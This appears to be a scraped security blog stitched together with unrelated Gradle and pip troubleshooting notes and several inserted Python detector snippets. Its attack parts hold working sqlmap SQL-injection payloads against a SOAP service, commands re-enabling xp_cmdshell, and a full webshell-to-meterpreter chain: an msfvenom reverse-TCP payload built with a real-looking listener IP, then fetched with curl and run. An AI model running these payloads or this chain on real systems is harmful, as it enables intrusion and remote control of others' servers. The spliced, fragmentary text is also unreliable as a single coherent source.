<c_me_com>10005</c_me_com><c_me_no>14</c_me_no><c_me_bt>10.11.201.233</c_me_bt><c_me_command>0</c_me_command><c_me_lenght>2</c_me_lenght><c_me_start>2000</c_me_start><c_me_lastvalue>0</c_me_lastvalue><c_me_maxstep>50</c_me_maxstep><c_me_webcode>com7.db001.db001t</c_me_webcode><c_me_by19>0.00</c_me_by19><c_me_by20>1</c_me_by20><c_me_lastdate4>2018-08-08T05:00:24.677+08:00</c_me_lastdate4><c_me_lastvalue4>313</c_me_lastvalue4><c_me_lastdate3>2018-08-08T06:03:06.137+08:00</c_me_lastdate3><c_me_lastvalue3>313</c_me_lastvalue3><c_me_lastdate2>2018-08-08T07:05:47.173+08:00</c_me_lastdate2><c_me_lastvalue2>313</c_me_lastvalue2><c_me_lastdate1>2018-08-08T08:08:28.543+08:00</c_me_lastdate1><c_me_lastvalue1>313</c_me_lastvalue1><c_me_lastsuredate>2018-08-08T11:11:05.27+08:00</c_me_lastsuredate><c_me_lastsurevalue>313</c_me_lastsurevalue></d2></ds></diffgr:diffgram></getcodeResult></getcodeResponse></soap:Body></soap:Envelope>

Ordinary queries:

Of course, in everyday injection work the kind above is not the only one; far more often we meet the common blind, UNION, boolean-blind and time-based-blind injections and so on. Our example has these as well, and naturally the all-purpose AWVS found them:

Discovered by Blind SQL Injection
URL encoded POST input ins was set to eizSls
Look at the true/false result for each input: an odd number of %27 (single quote) characters gives false, an even number gives true
462' => ERROR
462'' => OK
GwHgee''' => ERROR
7Ahb38'''' => OK
CXBMlX''''' => ERROR
xgBDwt'''''' => OK
eizSls''''''' => ERROR

The old way: run it straight through sqlmap~

POST /WebService1.asmx/getcode HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://vuln_ip:8081/WebService1.asmx?WSDL
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 17
Host: vuln_ip:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

ins=eizSls

Running this gives the same result; naturally it is the same injection point, and the data all comes from the getcode interface:

POST parameter 'ins' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: ins (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ins=eizSls' AND 7541 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7541=7541) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'EJIL'='EJIL

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: ins=eizSls' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(85)+CHAR(78)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(72)+CHAR(81)+CHAR(82)+CHAR(108)+CHAR(89)+CHAR(68)+CHAR(67)+CHAR(99)+CHAR(105)+CHAR(109)+CHAR(105)+CHAR(86)+CHAR(121)+CHAR(99)+CHAR(122)+CHAR(90)+CHAR(109)+CHAR(112)+CHAR(98)+CHAR(88)+CHAR(89)+CHAR(68)+CHAR(90)+CHAR(101)+CHAR(71)+CHAR(100)+CHAR(118)+CHAR(81)+CHAR(114)+CHAR(83)+CHAR(101)+CHAR(90)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- HqcH
---
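An added detection example, not part of the original post: a Python function that parses a SOAP envelope of the shape shown above, pulls every leaf parameter out of the Body and flags the indicators present in the sqlmap payloads (UNION ... SELECT, chains of CHAR(n)+, a quoted tautology, a SQL comment) together with the odd-quote-count condition behind the ERROR/OK alternation in the AWVS output. The envelopes it runs on are constructed, and the UNION sample is a shortened form of the payload above.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"

# Patterns taken from the sqlmap payloads above; each name is one indicator.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    "char_concat": re.compile(r"(?:CHAR\(\d+\)\s*\+\s*){2,}CHAR\(\d+\)", re.I),
    "tautology": re.compile(r"\b(?:AND|OR)\b\s*'[^']*'\s*=\s*'", re.I),
    "sql_comment": re.compile(r"--|/\*"),
}


def extract_params(envelope: str) -> dict:
    """Map each leaf element inside the SOAP Body to its text, keyed by local name."""
    root = ET.fromstring(envelope)
    body = root.find(f"{{{SOAP_ENV}}}Body")
    params = {}
    if body is None:
        return params
    for el in body.iter():
        if el is not body and len(el) == 0:
            params[el.tag.rsplit("}", 1)[-1]] = el.text or ""
    return params


def classify(value: str) -> list:
    """Return the indicator names that fire for one parameter value."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    # An odd number of single quotes leaves the server-side string literal open,
    # which is exactly the ERROR/OK alternation the AWVS output above shows.
    if value.count("'") % 2 == 1:
        hits.append("unbalanced_quote")
    return hits


def scan_envelope(envelope: str) -> dict:
    """Return {param: indicators} for every Body parameter that looks injected."""
    report = {}
    for name, value in extract_params(envelope).items():
        hits = classify(value)
        if hits:
            report[name] = hits
    return report


def make_envelope(ins_value: str) -> str:
    """Constructed request in the shape of the post's getcode call (not a real capture)."""
    return (
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV}" xmlns:urn="http://tempuri.org/">'
        "<SOAP-ENV:Header/><SOAP-ENV:Body><urn:getcode>"
        f"<urn:ins>{escape(ins_value)}</urn:ins>"
        "</urn:getcode></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


# The error-based payload from the sqlmap output above, and a shortened UNION one.
ERROR_BASED = ("1' AND 1597 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)"
               "+(SELECT (CASE WHEN (1597=1597) THEN CHAR(49) ELSE CHAR(48) END))"
               "+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113))) AND 'DZUD'='DZUD")
UNION_BASED = ("1' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113),"
               "NULL,NULL,NULL,NULL,NULL,NULL-- aKgd")

if __name__ == "__main__":
    for sample in ("1", "462'", ERROR_BASED, UNION_BASED):
        print(scan_envelope(make_envelope(sample)))
```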

Information gathering

Check the user: it turns out to be dbo. The meaning of [dbo] in SQL Server:

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:16:02] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> user
[11:16:13] [INFO] fetching SQL query output: 'user'
user:    'dbo'

Check whether the web server and the database are on separate hosts:

sql-shell> select @@servername;
[11:17:21] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
select @@servername;:    'WIN-VO157IKGT24'
sql-shell> select host_name();
[11:17:25] [INFO] fetching SQL SELECT statement query output: 'select host_name()'
select host_name();:    'WIN-VO157IKGT24'

Both return WIN-VO157IKGT24, so the web and database servers are probably not separated. Check the database version:

sql-shell> Select @@version
[11:17:34] [INFO] fetching SQL SELECT statement query output: 'Select @@version'
Select @@version:    'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) \n\tApr  2 2010 15:48:46 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)\n'
root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch --dbs
---
[11:04:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:34] [INFO] fetching database names
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ytems

[11:04:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'

[*] shutting down at 11:04:35

Privilege escalation

dbcc addextendedproc ("sp_oacreate","odsole70.dll");
dbcc addextendedproc ("xp_cmdshell","xplog70.dll");

to be continued;


  • Gradle packaging
    • https://blog.csdn.net/EthanCo/article/details/52064044
    • https://www.kutu66.com/GitHub/article_105897
    • https://jingyan.baidu.com/article/c45ad29c20a123051753e2af.html
.\gradlew.bat task
Active code page: 65001
Failed to notify ProjectEvaluationListener.afterEvaluate(), but primary configuration failure takes precedence.
java.lang.RuntimeException: SDK location not found. Define location with sdk.dir in the local.properties file or with an ANDROID_HOME environment variable.
        at org.gradle.initialization.DefaultGradleLauncher.doBuildStages(DefaultGradleLauncher.java:122)
        at org.gradle.initialization.DefaultGradleLauncher.access$200(DefaultGradleLauncher.java:32)
        at org.gradle.initialization.DefaultGradleLauncher$1.create(DefaultGradleLauncher.java:99)
        at org.gradle.initialization.DefaultGradleLauncher$1.create(DefaultGradleLauncher.java:93)
        at org.gradle.internal.progress.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:90)
        at org.gradle.internal.progress.DefaultBuildOperationExecutor.run(DefaultBuildOperationExecutor.java:62)
        at org.gradle.initialization.DefaultGradleLauncher.doBuild(DefaultGradleLauncher.java:93)
        at org.gradle.initialization.DefaultGradleLauncher.run(DefaultGradleLauncher.java:82)
        at org.gradle.launcher.exec.InProcessBuildActionExecuter$DefaultBuildController.run(InProcessBuildActionExecuter.java:94)
        at org.gradle.tooling.internal.provider.ExecuteBuildActionRunner.run(ExecuteBuildActionRunner.java:28)
        at org.gradle.launcher.exec.ChainingBuildActionRunner.run(ChainingBuildActionRunner.java:35)
        at org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:43)
        at org.gradle.launcher.exec.InProcessBuildActionExecuter.execute(InProcessBuildActionExecuter.java:28)
        at org.gradle.launcher.exec.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:78)
        at org.gradle.launcher.exec.ContinuousBuildActionExecuter.execute(ContinuousBuildActionExecuter.java:48)
        at org.gradle.launcher.exec.DaemonUsageSuggestingBuildActionExecuter.execute(DaemonUsageSuggestingBuildActionExecuter.java:51)
        at org.gradle.launcher.exec.DaemonUsageSuggestingBuildActionExecuter.execute(DaemonUsageSuggestingBuildActionExecuter.java:28)
        at org.gradle.launcher.cli.RunBuildAction.run(RunBuildAction.java:43)
        at org.gradle.internal.Actions$RunnableActionAdapter.execute(Actions.java:170)
        at org.gradle.launcher.cli.CommandLineActionFactory$ParseAndBuildAction.execute(CommandLineActionFactory.java:237)
        at org.gradle.launcher.cli.CommandLineActionFactory$ParseAndBuildAction.execute(CommandLineActionFactory.java:210)
        at org.gradle.launcher.cli.JavaRuntimeValidationAction.execute(JavaRuntimeValidationAction.java:35)
        at org.gradle.launcher.cli.JavaRuntimeValidationAction.execute(JavaRuntimeValidationAction.java:24)
        at org.gradle.launcher.cli.CommandLineActionFactory$WithLogging.execute(CommandLineActionFactory.java:206)
        at org.gradle.launcher.cli.CommandLineActionFactory$WithLogging.execute(CommandLineActionFactory.java:169)
        at org.gradle.launcher.cli.ExceptionReportingAction.execute(ExceptionReportingAction.java:33)
        at org.gradle.launcher.cli.ExceptionReportingAction.execute(ExceptionReportingAction.java:22)
        at org.gradle.launcher.Main.doAction(Main.java:33)
        at org.gradle.launcher.bootstrap.EntryPoint.run(EntryPoint.java:45)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at org.gradle.launcher.bootstrap.ProcessBootstrap.runNoExit(ProcessBootstrap.java:54)
        at org.gradle.launcher.bootstrap.ProcessBootstrap.run(ProcessBootstrap.java:35)
        at org.gradle.launcher.GradleMain.main(GradleMain.java:23)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at org.gradle.wrapper.BootstrapMainStarter.start(BootstrapMainStarter.java:33)
        at org.gradle.wrapper.WrapperExecutor.execute(WrapperExecutor.java:130)
        at org.gradle.wrapper.GradleWrapperMain.main(GradleWrapperMain.java:48)

FAILURE: Build failed with an exception.

https://blog.csdn.net/coder_ken/article/details/50853927


「Pentest」: Reverse shell from a one-liner webshell in Docker

Apr 27, 2020. | By: Bin4xin

Reverse shell from a one-liner webshell

Premise: a one-liner webshell has already been uploaded and can run commands such as ls, pwd and whoami; the problem is that the python, bash and perl reverse shells all fail, so there is no shortcut: bring in msf.

http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd
/u01/oracle/user_projects/domains/base_domain
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=whoami
oracle

Generating the shell file with msf

First generate the reverse-shell file with msfvenom, then make it executable.

root@iZj6cgn7odv59wmjjhe6zwZ:~# msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=47.52.233.92 LPORT=1234 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1046632 bytes
Final size of elf file: 1046632 bytes
root@iZj6cgn7odv59wmjjhe6zwZ:~# chmod 777 shell.elf
http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=ls
Test that the one-liner webshell can run commands
total 1100
drwxr-x--- 15 oracle oracle    4096 Apr 27 08:06 .
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 ..
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 autodeploy
drwxr-x---  6 oracle oracle    4096 Apr 25 00:23 bin
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 common
drwxr-x---  9 oracle oracle    4096 Apr 25 00:24 config
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 console-ext
-rw-r-----  1 oracle oracle     234 Apr 25 00:23 derby.log
-rw-r-----  1 oracle oracle     257 Apr 25 00:24 edit.lok
-rw-r-----  1 oracle oracle     327 Jul 19  2017 fileRealm.properties
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 init-info
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 lib
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 nodemanager
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 orchestration
drwxr-x---  2 oracle oracle    4096 Apr 26 01:39 original
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 security
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 servers
-rwxr-x---  1 oracle oracle     261 Apr 25 00:23 startWebLogic.sh
drwxr-x---  3 oracle oracle    4096 Apr 25 09:49 tmp

Downloading and running the shell file

Run the download command through the webshell; either wget or curl will do, since Linux machines usually ship with a download tool

http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=curl -o shell.elf http://ip/shell.elf
Wait for the download to finish, then set the permissions again
chmod 777 shell.elf
Check again:
total 1100
drwxr-x--- 15 oracle oracle    4096 Apr 27 08:06 .
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 ..
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 autodeploy
drwxr-x---  6 oracle oracle    4096 Apr 25 00:23 bin
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 common
drwxr-x---  9 oracle oracle    4096 Apr 25 00:24 config
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 console-ext
-rw-r-----  1 oracle oracle     234 Apr 25 00:23 derby.log
-rw-r-----  1 oracle oracle     257 Apr 25 00:24 edit.lok
-rw-r-----  1 oracle oracle     327 Jul 19  2017 fileRealm.properties
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 init-info
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 lib
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 nodemanager
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 orchestration
drwxr-x---  2 oracle oracle    4096 Apr 26 01:39 original
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 security
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 servers
-rwxrwxrwx  1 oracle oracle 1046632 Apr 27 08:06 shell.elf
-rwxr-x---  1 oracle oracle     261 Apr 25 00:23 startWebLogic.sh
drwxr-x---  3 oracle oracle    4096 Apr 25 09:49 tmp

Catching the shell

We can see the msf reverse-shell file has been downloaded successfully; run it directly with http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=./shell.elf, and don't forget to start the listener on the server before running it.

# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:1234

Once it runs, we can see the connection traffic arriving:

[*] Meterpreter session 1 opened (172.31.116.237:1234 -> 59.110.152.168:44832) at 2020-04-27 16:08:48 +0800

Next step:

meterpreter > shell
Process 460 created.
Channel 1 created.
whoami
oracle
python -c 'import pty;pty.spawn("/bin/sh")'
sh-4.2$ whoami
whoami
oracle
sh-4.2$ sudo su
sudo su
sh: sudo: command not found
python -c 'import pty;pty.spawn("/bin/bash")'
[oracle@5c6fe690ac22 base_domain]$ pwd
pwd
/u01/oracle/user_projects/domains/base_domain
[oracle@5c6fe690ac22 base_domain]$ ls
ls
autodeploy  console-ext           init-info      original   startWebLogic.sh
bin         derby.log             lib            security   tmp
common      edit.lok              nodemanager    servers
config      fileRealm.properties  orchestration  shell.elf
[oracle@5c6fe690ac22 base_domain]$ uname -a
uname -a
Linux 5c6fe690ac22 3.10.0-1062.12.1.el7.x86_64 ##1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
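From the defender's side this activity shows up in the web server's access log: the webshell lives in a timestamp-named JSP and is driven through a cmd query parameter. The following detector is an added example, not code from the original post; it runs over constructed combined-format log lines (documentation IP addresses, and the placeholder path reused from the text above).

```python
"""Flag webshell-style JSP requests in constructed access-log lines (added example)."""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in combined log format; 203.0.113.5 and 198.51.100.9 are
# documentation addresses, and /where/muma/path/are/ is the placeholder path
# from the text above, not a real location.
SAMPLE_ACCESS_LOG = """\
198.51.100.9 - - [27/Apr/2020:16:07:55 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3452 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Apr/2020:16:08:48 +0800] "GET /where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=./shell.elf HTTP/1.1" 200 0 "-" "python-requests/2.23"
198.51.100.9 - - [27/Apr/2020:16:09:02 +0800] "POST /www/htdocs/app/report.jsp?id=42 HTTP/1.1" 200 998 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Apr/2020:16:09:30 +0800] "GET /uploads/1587808301122_profile.jsp HTTP/1.1" 200 17 "-" "curl/7.68.0"
"""

# Combined log format: ip ident user [time] "method target protocol" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Query parameters commonly used to hand a command to a JSP webshell.
COMMAND_PARAMS = {"cmd", "command", "exec", "shell"}

# Upload handlers often store files as <epoch-milliseconds>_<original>.jsp,
# which is the shape of the file name in the text above.
TIMESTAMP_JSP = re.compile(r"(?:^|/)\d{13}_[^/]*\.jsp$", re.IGNORECASE)


def analyse_target(target: str) -> list[str]:
    """Return the reasons a request target looks like webshell traffic ([] if none)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".jsp"):
        return []
    reasons = []
    params = parse_qs(parts.query, keep_blank_values=True)
    cmd_keys = sorted(k for k in params if k.lower() in COMMAND_PARAMS)
    if cmd_keys:
        reasons.append("command-style parameter " + ",".join(cmd_keys))
    if TIMESTAMP_JSP.search(parts.path):
        reasons.append("epoch-millisecond-prefixed JSP name (upload-generated)")
    return reasons


def find_webshell_hits(log_text: str) -> list[dict]:
    """Parse combined-format lines and collect the suspicious ones with their reasons."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = analyse_target(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_ACCESS_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]}: {"; ".join(hit["reasons"])}')
```

On the sample, the two requests from 203.0.113.5 are flagged and the ordinary console and report requests are not.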

That's all.

[Read More]

「Terminal」: pip error 'unknown encoding'

Apr 1, 2020. | By: Bin4xin

  • The dreaded unknown encoding.

Ever since I changed the encoding of the Windows terminal, all kinds of problems have appeared: almost nothing run from the terminal works any more, failing with LookupError: unknown encoding: cp65001, as in the traceback below.

C:\Users\本阿信>pip --version
Traceback (most recent call last):
  File "c:\python27\lib\runpy.py", line 174, in _run_module_as_main
    "__main__", fname, loader, pkg_name)
  File "c:\python27\lib\runpy.py", line 72, in _run_code
    exec code in run_globals
  File "C:\Python27\Scripts\pip.exe\__main__.py", line 4, in <module>
  File "c:\python27\lib\site-packages\pip\_internal\cli\main.py", line 10, in <module>
    from pip._internal.cli.autocompletion import autocomplete
  File "c:\python27\lib\site-packages\pip\_internal\cli\autocompletion.py", line 9, in <module>
    from pip._internal.cli.main_parser import create_main_parser
  File "c:\python27\lib\site-packages\pip\_internal\cli\main_parser.py", line 7, in <module>
    from pip._internal.cli import cmdoptions
  File "c:\python27\lib\site-packages\pip\_internal\cli\cmdoptions.py", line 31, in <module>
    from pip._internal.utils.ui import BAR_TYPES
  File "c:\python27\lib\site-packages\pip\_internal\utils\ui.py", line 64, in <module>
    _BaseBar = _select_progress_class(IncrementalBar, Bar)  # type: Any
  File "c:\python27\lib\site-packages\pip\_internal\utils\ui.py", line 57, in _select_progress_class
    six.text_type().join(characters).encode(encoding)
LookupError: unknown encoding: cp65001

I have only myself to blame for fiddling with the text encoding in the first place. Whoever tied the bell must untie it: for now, pip can be used in this terminal by setting the encoding variable:

C:\Users\本阿信>set PYTHONIOENCODING=UTF-8

C:\Users\本阿信>pip --version
pip 20.0.2 from c:\python27\lib\site-packages\pip (python 2.7)

The linked article also suggests setting it globally with $env:PYTHONIOENCODING = "UTF-8", but I searched and did not find a way to do that; if you know how, please email me and teach me.
CHCP 936


UTF-8 is one concrete way of encoding Unicode:

Unicode code point range (hex) | UTF-8 encoding (binary)
-------------------------------+---------------------------------------
0000 0000 - 0000 007F          | 0xxxxxxx
0000 0080 - 0000 07FF          | 110xxxxx 10xxxxxx
0000 0800 - 0000 FFFF          | 1110xxxx 10xxxxxx 10xxxxxx
0001 0000 - 0010 FFFF          | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx

The \x pieces are the UTF-8 encoded bytes; applying the conversion rule turns them into a Unicode code point, which gives the corresponding Chinese character. The rule is simple: strip the \x, convert each hex pair to a number, then do the corresponding shift operations. Note that you first have to determine how many bytes the UTF-8 sequence has.
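The conversion just described, carried out by hand following the table above, as an added example that is not part of the original post. It also rejects the malformed inputs a strict decoder must reject (overlong forms, surrogates, truncated sequences), which is the part that matters when such a decoder sits in front of a security filter.

```python
"""Decode UTF-8 by hand following the table above (added example, not the post's code)."""
from __future__ import annotations

import re

# One row per table line: (lead-byte mask, expected masked value, sequence length,
# smallest code point that legitimately needs this many bytes).
_LEAD_FORMS = [
    (0x80, 0x00, 1, 0x0000),    # 0xxxxxxx
    (0xE0, 0xC0, 2, 0x0080),    # 110xxxxx 10xxxxxx
    (0xF0, 0xE0, 3, 0x0800),    # 1110xxxx 10xxxxxx 10xxxxxx
    (0xF8, 0xF0, 4, 0x10000),   # 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
]


def escapes_to_bytes(text: str) -> bytes:
    """Turn the '\\xe4\\xb8\\xad' notation into raw bytes: strip the \\x, parse the hex."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def decode_utf8(data: bytes) -> str:
    """Manual decoder: read the lead byte to get the length, then shift in 6 bits per
    continuation byte. Rejects bad lead or continuation bytes, truncated sequences,
    overlong forms, surrogates and code points above U+10FFFF."""
    out: list[str] = []
    i = 0
    while i < len(data):
        lead = data[i]
        for mask, value, length, minimum in _LEAD_FORMS:
            if lead & mask == value:
                break
        else:
            raise ValueError(f"invalid lead byte 0x{lead:02x} at offset {i}")
        if i + length > len(data):
            raise ValueError(f"truncated sequence at offset {i}")
        code_point = lead & (~mask & 0xFF)       # payload bits of the lead byte
        for j in range(1, length):
            cont = data[i + j]
            if cont & 0xC0 != 0x80:              # must be 10xxxxxx
                raise ValueError(f"invalid continuation byte 0x{cont:02x} at offset {i + j}")
            code_point = (code_point << 6) | (cont & 0x3F)
        # Overlong forms (e.g. C0 AF for '/') spend more bytes than the code point
        # needs; lenient decoders accept them, which is how path filters get bypassed.
        if code_point < minimum:
            raise ValueError(f"overlong encoding at offset {i}")
        if 0xD800 <= code_point <= 0xDFFF or code_point > 0x10FFFF:
            raise ValueError(f"invalid code point U+{code_point:04X} at offset {i}")
        out.append(chr(code_point))
        i += length
    return "".join(out)


def is_well_formed(data: bytes) -> bool:
    """True if decode_utf8 accepts the bytes."""
    try:
        decode_utf8(data)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    raw = escapes_to_bytes(r"\xe4\xb8\xad\xe6\x96\x87")
    print(raw.hex(), "->", decode_utf8(raw))
```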

Contact me: chihou.pro@gmail.com ^_^ Thanks

[Read More]

「Machine Learning」: sklearn learning notes - pip

Feb 21, 2020. | By: Bin4xin

pip environment problems

pip-timeout

When installing the scikit-learn dependencies, the install kept failing with a timeout, so I added the default-timeout parameter:

pip3 --default-timeout=1000 install -U scikit-learn
 Downloading https://pypi.tuna.tsinghua.edu.cn/packages/73/db/7d8204ddba84ab5d1e4fd1af8f82bbe39c589488bee71e45c662f4144010/scikit_learn-0.22.1-cp37-cp37m-manylinux1_x86_64.whl (7.0MB)
    100% |████████████████████████████████| 7.0MB 159kB/s 
Successfully installed scikit-learn-0.22.1
pip3 --default-timeout=1000 install -U SciPy
Downloading https://pypi.tuna.tsinghua.edu.cn/packages/dd/82/c1fe128f3526b128cfd185580ba40d01371c5d299fcf7f77968e22dfcc2e/scipy-1.4.1-cp37-cp37m-manylinux1_x86_64.whl (26.1MB)
    100% |████████████████████████████████| 26.1MB 44kB/s 
Successfully installed SciPy-1.4.1

Switching to a domestic mirror

Another possibility is that pip is fetching from an overseas index, which makes downloads very slow. In that case, switch directly to a domestic mirror:

vi ~/.pip/pip.conf
Put the following into it:
[global]
timeout = 6000
index-url = https://pypi.tuna.tsinghua.edu.cn/simple/
*******
** some domestic pip mirrors
*******
  Aliyun http://mirrors.aliyun.com/pypi/simple/
  University of Science and Technology of China https://pypi.mirrors.ustc.edu.cn/simple/
  Douban http://pypi.douban.com/simple/
  Tsinghua University https://pypi.tuna.tsinghua.edu.cn/simple/
  University of Science and Technology of China http://pypi.mirrors.ustc.edu.cn/simple/

On Windows:

Go to C:\Users\<username>\pip and, inside the pip directory, create a new file (not a folder) named:
pip.ini
and put the same contents as above into it.

Test

You can see that dependency downloads are now resolved from the pip index we specified.

# pip install pandas
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple
Requirement already satisfied: pandas in /usr/local/lib/python2.7/dist-packages (0.24.2)
Requirement already satisfied: pytz>=2011k in /usr/lib/python2.7/dist-packages (from pandas) (2019.3)
Requirement already satisfied: numpy>=1.12.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (1.16.6)
Requirement already satisfied: python-dateutil>=2.5.0 in /usr/local/lib/python2.7/dist-packages (from pandas) (2.8.1)
Requirement already satisfied: six>=1.5 in /usr/lib/python2.7/dist-packages (from python-dateutil>=2.5.0->pandas) (1.14.0)

[Read More]

「Asset Scanning」: Let's GyoiThon!

Jan 21, 2020. | By: Bin4xin


1 Installing the dependencies

After downloading the source, enter the folder and install the Python dependencies listed in requirements.txt:

PS G:\GyoiThon> pip install -r requirements.txt
